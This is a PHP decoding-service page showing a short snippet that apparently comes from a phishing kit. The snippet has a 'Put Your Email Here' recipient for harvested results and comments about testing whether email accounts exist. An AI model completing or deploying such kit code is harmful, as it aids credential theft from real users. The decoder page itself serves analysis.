Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php $result_to = "[email protected]";//Put Your Email Here #Function isWro..

Decoded Output download

<?php 
 
 
 $result_to = "[email protected]";//Put Your Email Here 
 
 #Function isWrong this function is a shortcut script by phpQuery That Where we can try if an email exist in Gmail or Hotmail or any Company's Database 
 #So don't touch any thing in this area for your result safety 
 
 require_once("iswrong.php"); 
  
 echo $ip_addresse; 
 
?>

Did this file decode correctly?

Original Code

<?php


 $result_to = "[email protected]";//Put Your Email Here

 #Function isWrong this function is a shortcut script by phpQuery That Where we can try if an email exist in Gmail or Hotmail or any Company's Database
 #So don't touch any thing in this area for your result safety

 require_once("iswrong.php");
 
 echo $ip_addresse;

?>

Function Calls

None

Variables

$result_to [email protected]

Stats

MD5 1da8cab8fe52a74b1c64bebeeca194e9
Eval Count 0
Decode Time 130 ms